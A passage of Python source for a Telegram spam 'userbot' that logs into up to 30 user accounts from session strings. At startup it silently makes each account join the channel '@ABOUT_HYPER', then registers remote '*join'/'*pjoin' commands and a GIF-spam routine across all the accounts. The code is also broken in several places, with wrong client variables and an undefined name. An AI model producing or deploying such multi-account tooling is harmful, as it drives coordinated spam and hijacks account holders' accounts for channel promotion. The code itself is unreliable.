TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 5")<br/> await sdk.start()<br/> await sdk(functions.channels.JoinChannelRequest(channel=""))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await sdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 5 not Found")<br/> pass<br/> session_name = "startup"<br/> sdk = TelegramClient(session_name, a, b)<br/> try:<br/> await sdk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if sixth:<br/> session_name = str(sixth)<br/> print("String 6 Found")<br/> adk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 6")<br/> await adk.start()<br/> await adk(functions.channels.JoinChannelRequest(channel=""))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await adk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 6 not Found")<br/> pass<br/> session_name = "startup"<br/> adk = TelegramClient(session_name, a, b)<br/> try:<br/> await adk.start()<br/> except Exception as e:<br/> pass<div></div> if seven:<br/> session_name = str(seven)<br/> print("String 7 Found")<br/> bdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 7")<br/> await bdk.start()<br/> await bdk(functions.channels.JoinChannelRequest(channel=""))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await bdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 7 not Found")<br/> pass<br/> session_name = "startup"<br/> bdk = TelegramClient(session_name, a, b)<br/> try:<br/> await bdk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if eight:<br/> session_name = str(eight)<br/> print("String 8 Found")<br/> cdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 8")<br/> await cdk.start()<br/> await cdk(functions.channels.JoinChannelRequest(channel=""))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await cdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 8 not Found")<br/> pass<br/> session_name = "startup"<br/> cdk = TelegramClient(session_name, a, b)<br/> try:<br/> await cdk.start()<br/> except Exception as e:<br/> pass <br/> <br/> if ninth:<br/> session_name = str(ninth)<br/> print("String 9 Found")<br/> ddk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 9")<br/> await ddk.start()<br/> await ddk(functions.channels.JoinChannelRequest(channel=""))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await ddk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 9 not Found")<br/> pass<br/> session_name = "startup"<br/> ddk = TelegramClient(session_name, a, b)<br/> try:<br/> await ddk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if tenth:<br/> session_name = str(tenth)<br/> print("String 10 Found")<br/> edk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 10")<br/> await edk.start()<br/> await edk(functions.channels.JoinChannelRequest(channel=""))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await edk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 10 not Found")<br/> pass<br/> session_name = "startup"<br/> edk = TelegramClient(session_name, a, b)<br/> try:<br/> await edk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if eleve:<br/> session_name = str(eleve)<br/> print("String 11 Found")<br/> vkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 11")<br/> await vkk.start()<br/> await vkk(functions.channels.JoinChannelRequest(channel=""))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await vkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 11 not Found")<br/> pass<br/> session_name = "startup"<br/> vkk = TelegramClient(session_name, a, b)<br/> try:<br/> await vkk.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/> if twelv:<br/> session_name = str(twelv)<br/> print("String 12 Found")<br/> kkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 12")<br/> await kkk.start()<br/> await kkk(functions.channels.JoinChannelRequest(channel=""))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await kkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 12 not Found")<br/> pass<br/> session_name = "startup"<br/> kkk = TelegramClient(session_name, a, b)<br/> try:<br/> await kkk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if thirt:<br/> session_name = str(thirt)<br/> print("String 13 Found")<br/> lkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 13")<br/> await lkk.start()<br/> await lkk(functions.channels.JoinChannelRequest(channel=""))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await lkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 13 not Found")<br/> pass<br/> session_name = "startup"<br/> lkk = TelegramClient(session_name, a, b)<br/> try:<br/> await lkk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if forte:<br/> session_name = str(forte)<br/> print("String 14 Found")<br/> mkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 14")<br/> await mkk.start()<br/> await mkk(functions.channels.JoinChannelRequest(channel=""))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await mkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 14 not Found")<br/> pass<br/> session_name = "startup"<br/> mkk = TelegramClient(session_name, a, b)<br/> try:<br/> await mkk.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/> if fifth:<br/> session_name = str(fifth)<br/> print("String 15 Found")<br/> sid = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 15")<br/> await sid.start()<br/> await sid(functions.channels.JoinChannelRequest(channel=""))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await sid.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 15 not Found")<br/> pass<br/> session_name = "startup"<br/> sid = TelegramClient(session_name, a, b)<br/> try:<br/> await sid.start()<br/> except Exception as e:<br/> pass<div></div><br/> if sieee:<br/> session_name = str(sieee)<br/> print("String 16 Found")<br/> shy = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 16")<br/> await shy.start()<br/> botme = await shy.get_me()<br/> await shy(functions.channels.JoinChannelRequest(channel=""))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 16 not Found")<br/> session_name = "startup"<br/> shy = TelegramClient(session_name, a, b)<br/> try:<br/> await shy.start()<br/> except Exception as e:<br/> pass<br/> <br/> if seeee:<br/> session_name = str(seeee)<br/> print("String 17 Found")<br/> aan = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 17")<br/> await aan.start()<br/> botme = await aan.get_me()<br/> await aan(functions.channels.JoinChannelRequest(channel=""))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aan(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 17 not Found")<br/> session_name = "startup"<br/> aan = TelegramClient(session_name, a, b)<br/> try:<br/> await aan.start()<br/> except Exception as e:<br/> pass<br/> <br/> if eieee:<br/> session_name = str(eieee)<br/> print("String 18 Found")<br/> ake = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 18")<br/> await ake.start()<br/> botme = await ake.get_me()<br/> await ake(functions.channels.JoinChannelRequest(channel=""))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ake(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 18 not Found")<br/> session_name = "startup"<br/> ake = TelegramClient(session_name, a, b)<br/> try:<br/> await ake.start()<br/> except Exception as e:<br/> pass<br/> <br/> if nieee:<br/> session_name = str(nieee)<br/> print("String 19 Found")<br/> eel = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 19")<br/> await eel.start()<br/> botme = await eel.get_me()<br/> await eel(functions.channels.JoinChannelRequest(channel=""))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eel(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 19 not Found")<br/> session_name = "startup"<br/> eel = TelegramClient(session_name, a, b)<br/> try:<br/> await idk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if gandu:<br/> session_name = str(gandu)<br/> print("String 20 Found")<br/> khu = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 20")<br/> await khu.start()<br/> botme = await khu.get_me()<br/> await khu(functions.channels.JoinChannelRequest(channel=""))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await khu(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 20 not Found")<br/> session_name = "startup"<br/> khu = TelegramClient(session_name, a, b)<br/> try:<br/> await khu.start()<br/> except Exception as e:<br/> pass<br/> <br/> if ekish:<br/> session_name = str(ekish)<br/> print("String 21 Found")<br/> shi = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 21")<br/> await shi.start()<br/> botme = await shi.get_me()<br/> await shi(functions.channels.JoinChannelRequest(channel=""))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shi(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 21 not Found")<br/> session_name = "startup"<br/> shi = TelegramClient(session_name, a, b)<br/> try:<br/> await shi.start()<br/> except Exception as e:<br/> pass<br/> <br/> if baish:<br/> session_name = str(baish)<br/> print("String 22 Found")<br/> yaa = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 22")<br/> await yaa.start()<br/> botme = await yaa.get_me()<br/> await yaa(functions.channels.JoinChannelRequest(channel=""))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await yaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 22 not Found")<br/> session_name = "startup"<br/> yaa = TelegramClient(session_name, a, b)<br/> try:<br/> await yaa.start()<br/> except Exception as e:<br/> pass<br/> <br/> if teish:<br/> session_name = str(teish)<br/> print("String 23 Found")<br/> dav = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 23")<br/> await dav.start()<br/> botme = await dav.get_me()<br/> await dav(functions.channels.JoinChannelRequest(channel=""))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await dav(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 23 not Found")<br/> session_name = "startup"<br/> dav = TelegramClient(session_name, a, b)<br/> try:<br/> await dav.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tfour:<br/> session_name = str(tfour)<br/> print("String 24 Found")<br/> raj = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 24")<br/> await raj.start()<br/> botme = await raj.get_me()<br/> await raj(functions.channels.JoinChannelRequest(channel=""))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await raj(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 24 not Found")<br/> session_name = "startup"<br/> raj = TelegramClient(session_name, a, b)<br/> try:<br/> await raj.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tfive:<br/> session_name = str(tfive)<br/> print("String 25 Found")<br/> put = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 25")<br/> await put.start()<br/> botme = await put.get_me()<br/> await put(functions.channels.JoinChannelRequest(channel=""))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await put(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 25 not Found")<br/> session_name = "startup"<br/> put = TelegramClient(session_name, a, b)<br/> try:<br/> await put.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tsix:<br/> session_name = str(tsix)<br/> print("String 26 Found")<br/> eag = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 26")<br/> await eag.start()<br/> botme = await eag.get_me()<br/> await eag(functions.channels.JoinChannelRequest(channel=""))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await eag(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 26 not Found")<br/> session_name = "startup"<br/> eag = TelegramClient(session_name, a, b)<br/> try:<br/> await eag.start()<br/> except Exception as e:<br/> pass<br/> <br/> if tseven:<br/> session_name = str(tseven)<br/> print("String 27 Found")<br/> ydk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 27")<br/> await gle.start()<br/> await gle(functions.channels.JoinChannelRequest(channel=""))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await gle(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await gle.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 27 not Found")<br/> pass<br/> session_name = "startup"<br/> gle = TelegramClient(session_name, a, b)<br/> try:<br/> await gle.start()<br/> except Exception as e:<br/> pass<div></div> if teight:<br/> session_name = str(teight)<br/> print("String 28 Found")<br/> wal = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 28")<br/> await wal.start()<br/> await wal(functions.channels.JoinChannelRequest(channel=""))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wal(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await wal.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 28 not Found")<br/> pass<br/> session_name = "startup"<br/> wal = TelegramClient(session_name, a, b)<br/> try:<br/> await wal.start()<br/> except Exception as e:<br/> pass<div></div> if tnine:<br/> session_name = str(tnine)<br/> print("String 29 Found")<br/> aaa = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 29")<br/> await aaa.start()<br/> await aaa(functions.channels.JoinChannelRequest(channel=""))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await aaa(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await aaa.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 29 not Found")<br/> pass<br/> session_name = "startup"<br/> aaa = TelegramClient(session_name, a, b)<br/> try:<br/> await aaa.start()<br/> except Exception as e:<br/> pass<div></div> if thirty:<br/> session_name = str(thirty)<br/> print("String 30 Found")<br/> boy = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 30")<br/> await boy.start()<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await boy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await boy.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 30 not Found")<br/> pass<br/> session_name = "startup"<br/> boy = TelegramClient(session_name, a, b)<br/> try:<br/> await boy.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/>loop = asyncio.get_event_loop()<br/>loop.run_until_complete(start_yukki()) <div></div>async def gifspam(e, smex):<br/> try:<br/> await e.client(<br/> functions.messages.SaveGifRequest(<br/> id=types.InputDocument(<br/> id=sandy.media.document.id,<br/> access_hash=smex.media.document.access_hash,<br/> file_reference=smex.media.document.file_reference,<br/> ),<br/> unsave=True,<br/> )<br/> )<br/> except Exception as e:<br/> pass<div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*join")) <br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\.join"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*join"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*join"))<div></div><br/>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗝𝗼𝗶𝗻\n\nCommand:\n\n.join <Public Channel or Group Link/Username>"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 6:<br/> bc = yukki[0]<br/> text = "Joining..."<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await e.client(functions.channels.JoinChannelRequest(channel=bc))<br/> await event.edit("Succesfully Joined")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*pjoin")) <br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*pjoin"))<div></div><div></div>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗣𝗿𝗶𝘃𝗮𝘁𝗲 